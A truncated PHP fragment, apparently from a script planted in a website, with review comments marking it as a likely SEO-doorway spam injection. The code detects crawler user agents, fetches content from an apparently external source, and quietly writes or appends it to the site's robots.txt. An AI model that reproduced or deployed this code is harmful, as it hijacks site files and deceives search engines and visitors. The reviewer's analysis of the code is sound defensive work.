// NOTE(review): this chunk is truncated on both sides — it opens mid-array
// (the tail of a $params array literal built from request scheme+host, URI,
// URL, User-Agent and Referer) and ends inside an unterminated string
// literal, so the code below is left byte-identical; comments only.
//
// SECURITY(review): the visible logic intercepts crawler user agents
// (isCrawler($userAgent)) and any request URI ending in "robots" or ".xml",
// fetches content from an external source (getContent($urlMap, $params) —
// helper not visible here; presumably a remote fetch, verify), and writes
// that content into __DIR__ . '/robots.txt'. Serving crawler-specific,
// remotely sourced robots/sitemap content is the classic shape of an
// SEO-doorway / spam injection script — confirm the provenance of this
// file before keeping it.
//
// Details grounded in the visible code:
//  * file_put_contents(..., $subfile ? 8 : 0): 8 is FILE_APPEND, so when
//    $requrl does not contain "index.php" the output is APPENDED to
//    robots.txt instead of overwriting it. The write is @-suppressed.
//  * "Success" is judged solely by the word "sitemap" (case-insensitive)
//    appearing in the file just written, then the script die()s either way.
//  * The first inner guard die()s when the URI ends in "/robots"/"?robots"
//    but REQUEST_URI contains ".php" and differs from the computed $requri.
//  * The trailing elseif begins a check on the first 5 bytes of $output;
//    the comparison string literal continues past this chunk.
$http . $domain, 'req_uri' => $requri, 'req_url' => $requrl, 'req_ua' => $userAgent, 'req_rf' => $referer ); if (isCrawler($userAgent) || substr($params['req_uri'], -6) === 'robots' || substr($params['req_uri'], -4) === '.xml') { $sRequri = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : ''; if(in_array(substr($params['req_uri'], -7), ['/robots', '?robots']) && strpos($_SERVER['REQUEST_URI'],'.php') !== false && $sRequri !== $requri){ die('robots.txt and sitemap.xml file create fail by subfile!'); } $output = getContent($urlMap, $params); if (in_array(substr($params['req_uri'], -7), ['/robots', '?robots']) && !empty($output)) { $subfile = strpos($requrl,'index.php') === false ? true : false; $ret = @file_put_contents(__DIR__ . '/robots.txt', $output, $subfile ? 8 : 0); $robots_cont = file_get_contents(__DIR__ . '/robots.txt'); if ($ret !== false && strpos(strtolower($robots_cont), "sitemap") !== false) { die('robots.txt and sitemap.xml file create success!'); } else { die('robots.txt and sitemap.xml file create fail!'); } } elseif (!empty($output)) { if (substr($output, 0, 5) === '